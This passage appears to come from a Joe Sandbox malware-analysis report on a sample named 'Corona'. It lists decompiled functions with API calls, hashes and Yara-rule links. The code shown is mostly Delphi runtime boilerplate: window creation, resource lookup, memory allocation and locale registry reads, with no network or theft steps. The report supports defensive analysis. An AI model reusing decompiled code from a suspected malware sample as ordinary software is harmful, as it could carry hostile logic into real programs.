                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: a607c74df08413ae2df3ce57e4748049c4e7691b590c2dee72c4e2ec912d6aee
                                  • Instruction ID: 929b3d79ffeb89c3cac09a9880bac3458cfdc7d31ab478386ca27a7044c283c0
                                  • Opcode Fuzzy Hash: a607c74df08413ae2df3ce57e4748049c4e7691b590c2dee72c4e2ec912d6aee
                                  • Instruction Fuzzy Hash: 4DF08272F0062027EB605AAA5C85B535A849B857A0F1540B7FE09FF3E9D6B58C0142AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044E66C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044E66C(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr _t13;
				void* _t16;
				void* _t23;
				void* _t27;
				void* _t29;
				void* _t30;
				intOrPtr _t31;

				_v8 = __eax;
				_t8 = _v8;
				if( *((intOrPtr*)(_t8 + 0x30)) != 0) {
					_t9 =  *0x452bb4; // 0x2131320
					_t29 = E0044B870(_t9) - 1;
					if(_t29 < 0) {
						L9:
						return E0044E610(0, _t31);
					}
					_t30 = _t29 + 1;
					_t27 = 0;
					while(1) {
						_t13 =  *0x452bb4; // 0x2131320
						_t23 = E0044B85C(_t13, _t27);
						if( *((char*)(_t23 + 0x57)) != 0 && ( *(_t23 + 0x190) == 0 || E00435154(_t23) != 0 || IsChild(E00434EF4(_t23),  *(_t23 + 0x190)) == 0)) {
							break;
						}
						_t27 = _t27 + 1;
						_t30 = _t30 - 1;
						if(_t30 != 0) {
							continue;
						}
						goto L9;
					}
					_t16 = E0044E610(1, _t31); // executed
					return _t16;
				}
				return _t8;
			}













                                  0x0044e673
                                  0x0044e676
                                  0x0044e67d
                                  0x0044e67f
                                  0x0044e68b
                                  0x0044e68e
                                  0x0044e6e2
                                  0x00000000
                                  0x0044e6ea
                                  0x0044e690
                                  0x0044e691
                                  0x0044e693
                                  0x0044e695
                                  0x0044e69f
                                  0x0044e6a5
                                  0x00000000
                                  0x00000000
                                  0x0044e6de
                                  0x0044e6df
                                  0x0044e6e0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044e6e0
                                  0x0044e6d6
                                  0x00000000
                                  0x0044e6db
                                  0x0044e6f0

                                  APIs
                                  • IsChild.USER32(00000000,00000000), ref: 0044E6CA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Child
                                  • String ID:
                                  • API String ID: 3815930669-0
                                  • Opcode ID: cad04f721ded33b40a2f7cf7e7344c33a0d4cc7366892991884cb40792fb2e97
                                  • Instruction ID: 2553d2f463d1a2d35830ae31264210490092e659a8a63558b15f5b2f19cfb3f2
                                  • Opcode Fuzzy Hash: cad04f721ded33b40a2f7cf7e7344c33a0d4cc7366892991884cb40792fb2e97
                                  • Instruction Fuzzy Hash: 5001B531A042145BFB11AA6F9D45B9B739CBB20358F92147BF804CB252DA7CDC0086AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004132A8, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 41%
                                  			E004132A8(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x452664; // 0x400000
				}
				_t10 = FindResourceA(_t20, E0040430C(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t32);
					_push(0xa);
					_v8 = E00415BC8(_t20, 1);
					_push(_t38);
					_push(0x41331c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E004156C8(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E00413323);
					return E004030FC(_v8);
				}
			}


















                                  0x004132a9
                                  0x004132ab
                                  0x004132af
                                  0x004132b1
                                  0x004132b3
                                  0x004132b7
                                  0x004132b9
                                  0x004132b9
                                  0x004132d1
                                  0x004132d4
                                  0x004132d6
                                  0x0041332a
                                  0x004132d8
                                  0x004132d8
                                  0x004132d9
                                  0x004132e9
                                  0x004132ee
                                  0x004132ef
                                  0x004132f4
                                  0x004132f7
                                  0x004132ff
                                  0x00413304
                                  0x00413308
                                  0x0041330b
                                  0x0041330e
                                  0x0041331b
                                  0x0041331b

                                  APIs
                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 004132CA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: e8a400e94294f39d569de3495f7840357d58904100a51dfcf8cbf1242b1d1131
                                  • Instruction ID: 1c110013ace38ab411131a24d31fa12a1cd2c8f4e4a854ede420c50bd2529dd0
                                  • Opcode Fuzzy Hash: e8a400e94294f39d569de3495f7840357d58904100a51dfcf8cbf1242b1d1131
                                  • Instruction Fuzzy Hash: 5B014731304304AFE310EF56EC42DAAB7ADDB89324751407AF90093391DA79AD008658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040679A, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040679A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402908();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004028F8(_t13);
				return _t24;
			}








                                  0x0040679f
                                  0x004067a3
                                  0x004067a8
                                  0x004067aa
                                  0x004067db
                                  0x004067e4
                                  0x004067f0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 0f791f5ec92d7411cc98720ed8fc28380d029dde8c53ca6ab55f4098cc804929
                                  • Instruction ID: 41f77127b050866993e62dbd8b4b8cdc0627ff4e7fbb11427cfc4cb163cae08b
                                  • Opcode Fuzzy Hash: 0f791f5ec92d7411cc98720ed8fc28380d029dde8c53ca6ab55f4098cc804929
                                  • Instruction Fuzzy Hash: 2CF0CFB2700108BF8B80DE9DDC85E9B77ECEB4D2A4B01412AFA08E3200D234ED108BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040679C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040679C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402908();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004028F8(_t13);
				return _t24;
			}








                                  0x004067a3
                                  0x004067a8
                                  0x004067aa
                                  0x004067db
                                  0x004067e4
                                  0x004067f0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 85e4eb90c000c236c85eadefe313f4ffd22fa3105f9eac2d859ba02dd15c19cb
                                  • Instruction ID: de0e102495ea7130531c77c1ef8f652a4e44ef770002770581a3c477095a4666
                                  • Opcode Fuzzy Hash: 85e4eb90c000c236c85eadefe313f4ffd22fa3105f9eac2d859ba02dd15c19cb
                                  • Instruction Fuzzy Hash: 9DF07FB6700118AF8B80DE9DDD85E9B77ECEB4D2A4B05412AFA18E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004067F4, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004067F4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402908();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004028F8(_t12);
				return _t22;
			}








                                  0x004067fb
                                  0x00406800
                                  0x00406802
                                  0x00406831
                                  0x0040683a
                                  0x00406846

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: d0f946a022014cc29194e441e8b5c77c45096e0facff00cf9c5014c6900ae325
                                  • Instruction ID: fcd10d3d88eaa5ad34109d01075fa5bcd444e4693c61fb235d97a77239da6274
                                  • Opcode Fuzzy Hash: d0f946a022014cc29194e441e8b5c77c45096e0facff00cf9c5014c6900ae325
                                  • Instruction Fuzzy Hash: E3F0E2B2700208BFCB80DE9EDC85E9B77ECEB4D2A4B00412ABA0CE3241D174EC1087B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439D64, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00439D64(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x439dea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x452b18 =  *0x452b18 - 1;
				if( *0x452b18 < 0) {
					 *0x452b14 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x452b14;
					E00439B30(_t16, __edi,  *0x452b14);
					_t6 =  *0x42a6a0; // 0x42a6ec
					E00412F34(_t6, _t16, _t17,  *0x452b14);
					_t8 =  *0x42a6a0; // 0x42a6ec
					E00412FD4(_t8, _t16, _t17, _t31);
					_t21 =  *0x42a6a0; // 0x42a6ec
					_t10 =  *0x43b104; // 0x43b150
					E00412F80(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x42a6a0; // 0x42a6ec
					_t12 =  *0x439df4; // 0x439e40
					E00412F80(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x42a6a0; // 0x42a6ec
					_t14 =  *0x439f18; // 0x439f64
					E00412F80(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x439df1);
				return 0;
			}















                                  0x00439d64
                                  0x00439d64
                                  0x00439d69
                                  0x00439d6a
                                  0x00439d6f
                                  0x00439d72
                                  0x00439d75
                                  0x00439d7c
                                  0x00439d8c
                                  0x00439d8c
                                  0x00439d93
                                  0x00439d98
                                  0x00439d9d
                                  0x00439da2
                                  0x00439da7
                                  0x00439dac
                                  0x00439db2
                                  0x00439db7
                                  0x00439dbc
                                  0x00439dc2
                                  0x00439dc7
                                  0x00439dcc
                                  0x00439dd2
                                  0x00439dd7
                                  0x00439dd7
                                  0x00439dde
                                  0x00439de1
                                  0x00439de4
                                  0x00439de9

                                  APIs
                                  • GetVersion.KERNEL32(00000000,00439DEA), ref: 00439D7E
                                    • Part of subcall function 00439B30: GetCurrentProcessId.KERNEL32(?,00000000,00439CA8), ref: 00439B51
                                    • Part of subcall function 00439B30: GlobalAddAtomA.KERNEL32 ref: 00439B84
                                    • Part of subcall function 00439B30: GetCurrentThreadId.KERNEL32 ref: 00439B9F
                                    • Part of subcall function 00439B30: GlobalAddAtomA.KERNEL32 ref: 00439BD5
                                    • Part of subcall function 00439B30: RegisterClipboardFormatA.USER32 ref: 00439BEB
                                    • Part of subcall function 00439B30: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 00439C6F
                                    • Part of subcall function 00439B30: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00439C80
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: 94ac02c2c14a6a5a9030652c52386c41390c28d5d1cbe5cc04f3b75338800a9b
                                  • Instruction ID: a99d796cf09870756797ea3243eeb7a2ebe9b797756b885923b7976b6a35b7b9
                                  • Opcode Fuzzy Hash: 94ac02c2c14a6a5a9030652c52386c41390c28d5d1cbe5cc04f3b75338800a9b
                                  • Instruction Fuzzy Hash: AAF037343142418FD614EF26EE9395673A4FB49304BDA103AF84082666C7A8AC63DA8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EA0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404EA0(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E004050DC(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                  0x00404ea8
                                  0x00404eae
                                  0x00404eba
                                  0x00404ebe
                                  0x00404ec7
                                  0x00404ecc
                                  0x00404ece
                                  0x00404ed3
                                  0x00404ed5
                                  0x00404ed8
                                  0x00404ed8
                                  0x00404ed3
                                  0x00404edb
                                  0x00404ee6

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?,00000400,?,00410414,004136A7,00000000,004136CC), ref: 00404EBE
                                    • Part of subcall function 004050DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?), ref: 004050F8
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001), ref: 00405116
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4), ref: 00405134
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405152
                                    • Part of subcall function 004050DC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040519B
                                    • Part of subcall function 004050DC: RegQueryValueExA.ADVAPI32(?,00405348,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001), ref: 004051B9
                                    • Part of subcall function 004050DC: RegCloseKey.ADVAPI32(?,004051E8,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004051DB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 0ef6dd6ea0a7583c5597149073394501fd938edc92eb879c0ef5ecac17f741e7
                                  • Instruction ID: 8b1c8c533dd4c884e6db8f6835b50d8e4bb5f8094e49f176a92dc794993722f9
                                  • Opcode Fuzzy Hash: 0ef6dd6ea0a7583c5597149073394501fd938edc92eb879c0ef5ecac17f741e7
                                  • Instruction Fuzzy Hash: B7E06DB1A003148FCB10DE58C8C1A4733D8BB48754F0009A6ED58EF386E375DD208BE8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407AD0, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407AD0(void* __eax, void* __edx) {
				int _t3;
				char* _t5;
				int _t7;
				int _t10;
				void* _t12;

				_t12 = __eax;
				_t3 = E0040410C(__edx);
				_t5 = E0040430C(__edx);
				_t7 = E0040410C(_t12);
				_t10 = CompareStringA(0x400, 1, E0040430C(_t12), _t7, _t5, _t3); // executed
				return _t10 - 2;
			}








                                  0x00407ad4
                                  0x00407ad8
                                  0x00407ae0
                                  0x00407ae8
                                  0x00407afd
                                  0x00407b07

                                  APIs
                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00407B17,?,?,00407EA1), ref: 00407AFD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CompareString
                                  • String ID:
                                  • API String ID: 1825529933-0
                                  • Opcode ID: 6d8a940a681428d0d07aefee9c1a3cc682377ecffd4af08846e849c37c324d40
                                  • Instruction ID: 6d3a831ffb41c39d7498f46f71b70cf6dbd88d2acc670fabd014eaf60ef9679a
                                  • Opcode Fuzzy Hash: 6d8a940a681428d0d07aefee9c1a3cc682377ecffd4af08846e849c37c324d40
                                  • Instruction Fuzzy Hash: 36D09EE13105202AD654B6FE0D86F5B068C8B89719B00223AB708FA2C3D9BC8D4106ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004016A8, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004016A8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4525e8; // 0x5ba96c
				while(_t29 != 0x4525e8) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                  0x004016af
                                  0x004016b3
                                  0x004016ba
                                  0x004016cf
                                  0x004016d7
                                  0x004016dd
                                  0x004016e3
                                  0x004016e6
                                  0x0040172a
                                  0x004016ee
                                  0x004016f4
                                  0x004016f8
                                  0x004016fa
                                  0x004016fa
                                  0x00401700
                                  0x00401702
                                  0x00401702
                                  0x00401708
                                  0x00401715
                                  0x0040171c
                                  0x0040171e
                                  0x00401724
                                  0x00000000
                                  0x00401724
                                  0x0040171c
                                  0x00401728
                                  0x00401728
                                  0x00401739

                                  APIs
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401715
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 6b516112e56187e4cdffaeb55c8bbeca190ccf4b5deac7542238317eafebb680
                                  • Instruction ID: f98a9aafaff50bbb2ca684290b40d85e472c83ab9c3f8df584011134f5a0e072
                                  • Opcode Fuzzy Hash: 6b516112e56187e4cdffaeb55c8bbeca190ccf4b5deac7542238317eafebb680
                                  • Instruction Fuzzy Hash: 5811CE76A047059FC3108F29CC80A1BB7E5EFC4361F05C53EE598A73A5E735AC418B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A128, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041A128(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x452884 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x452880; // 0x20e0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004028B8(0x4503ec, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041A120(_t2, E0041A100);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041A120(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x452884;
						 *0x452884 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x452880 = _t35;
				}
				_t25 =  *0x452884;
				 *0x452884 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x452884;
			}








                                  0x0041a136
                                  0x0041a146
                                  0x0041a14b
                                  0x0041a14d
                                  0x0041a152
                                  0x0041a154
                                  0x0041a161
                                  0x0041a16b
                                  0x0041a173
                                  0x0041a176
                                  0x0041a176
                                  0x0041a179
                                  0x0041a179
                                  0x0041a17c
                                  0x0041a186
                                  0x0041a18b
                                  0x0041a18e
                                  0x0041a190
                                  0x0041a197
                                  0x0041a19e
                                  0x0041a19e
                                  0x0041a1a6
                                  0x0041a1ab
                                  0x0041a1b0
                                  0x0041a1b6
                                  0x0041a1bd

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A146
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
